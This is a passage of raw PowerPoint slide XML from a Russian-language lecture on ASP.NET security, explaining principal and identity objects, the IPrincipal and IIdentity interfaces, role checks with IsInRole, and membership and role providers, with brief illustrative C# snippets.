            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>Независимо от используемого метода аутентификации, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>ASP.Net </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>использует одну и ту же модель представления информации о пользователях и ролях. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>С пользователями, которые подключились к </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>приложению связываются объекты </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>principal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>и </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>identity, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>на основе предоставленных ими регистрационных данных. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>Объект </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>principal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>представляет текущий контекст безопасности (security context) пользователя. Он объединяет объект </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>identity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t> данного пользователя и информацию о его роли, привилегиях и т.п. хранимую в учетной записи.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>Это позволяет выполнять авторизацию основанную на ролях и предоставляет ссылку на соответствующий объект идентификации (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>identity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>Объект идентификации представляет успешно аутентифицированного пользователя и содержит информацию о пользователе, например, имя пользователя.</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ru-RU" smtClean="0"/>
              <a:t>Интерфейс IPrincipal</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79875" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1412875"/>
            <a:ext cx="8229600" cy="5184775"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>Все </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>principal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>объекты реализуют интерфейс IPrincipal, который описывает базовый набор функциональности.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>При работе со свойством </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>User </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>текущей </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>страницы или текущего HTTP контекста (HttpContext.Current) используется объект IPrincipal,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>который представляет контекст безопасности текущего пользователя.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>Интерфейс IPrincipal включает:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>свойство I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>dentity, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>которое ссылается на объект </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>dentity, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>содержащий информацию о текущем пользователе.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>метод </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>IsInRole() – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>проверка принадлежности пользователя к некоторой роли.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>Например:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>if (HttpContext.Current.User.IsInRole("Admin"))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>    // (Do something.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>Такой объект создается автоматически, но его можно создать и программно, например, на основе информации из базы данных.</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smtClean="0"/>
              <a:t>Интерфейс I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Identity</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80899" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8229600" cy="4924425"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Данный интерфейс определяет основную информацию, описывающую текущего пользователя.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Он включает следующие основные свойства:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="808038" lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" smtClean="0"/>
              <a:t>AuthenticationType</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>используемый тип аутентификации в виде строкм</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t> (forms, Passport,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>NTLM, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>или </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>custom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="808038" lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" smtClean="0"/>
              <a:t>IsAuthenticated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>: true</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t> если пользователь аутентифицирован иначе </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>false.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="808038" lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" smtClean="0"/>
              <a:t>Name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>имя текущего пользователя в виде строки.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Можно получить объект</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t> IIdentity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>, который представляет текущего пользователя с помощью объекта </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>IPrincipal.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t> Например:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>if (HttpContext.Current.User.Identity.IsAuthenticated) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>lblUserName.Text = HttpContext.Current.User.Identity.Name + " is logged in";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Тип объекта идентификации зависит от типа используемой аутентификации: Например:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="808038" lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>System.Web.Security.FormsIdentity: для пользователей подключившихся с использованием аутентификации форм</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="808038" lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t> System.Security.Principal.WindowsIdentity: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>для пользователей подключившихся с использованием учетной записи </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>Windows</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74638"/>
            <a:ext cx="8229600" cy="777875"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="4000" smtClean="0"/>
              <a:t>Свойство </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" smtClean="0"/>
              <a:t>User </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="4000" smtClean="0"/>
              <a:t>в классе </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" smtClean="0"/>
              <a:t>Page</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="4000" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81923" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1268413"/>
            <a:ext cx="8229600" cy="5184775"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" smtClean="0"/>
              <a:t>Пространство имен System.Security.Principal </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" smtClean="0"/>
              <a:t>Свойство </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>User </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" smtClean="0"/>
              <a:t>возвращает объект класса Рrincipal, который описывает контекст безопасности пользователя, от чьего имени выполняется код, включая данные учетной записи и все его роли.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>User </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" smtClean="0"/>
              <a:t>имеет:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>Свойство </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Identity (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>объект класса </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Identity)</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2400" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Name,</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2000" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>IsAuthenticated, </a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2000" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>AuthenticationType;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>Метод проверки принадлежности роли</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>bool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t> IsInRole( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" i="1" smtClean="0"/>
              <a:t>role</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t> )</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="24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28600"/>
            <a:ext cx="8382000" cy="585788"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" smtClean="0"/>
              <a:t>Security ‘providers’ for common tasks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9219" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1417638"/>
            <a:ext cx="8410575" cy="5222875"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>Membership providers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Works with xxMembershipProvider to simplify common tasks in building security infrastructure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" smtClean="0"/>
              <a:t>CreateUser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" smtClean="0"/>
              <a:t>DeleteUser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" smtClean="0"/>
              <a:t>ChangePassword</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" smtClean="0"/>
              <a:t>ValidateUser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>Role providers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>xxRoleProvider implements common role-based authorization features</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" smtClean="0"/>
              <a:t>CreateRole</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" smtClean="0"/>
              <a:t>IsUserInRole</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" smtClean="0"/>
              <a:t>GetAllRoles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" smtClean="0"/>
              <a:t>GetRolesForUser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>Several new controls generate large pieces of security UI</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ru-RU" smtClean="0"/>
              <a:t>Классы </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Principal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>и </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Identity</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82947" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
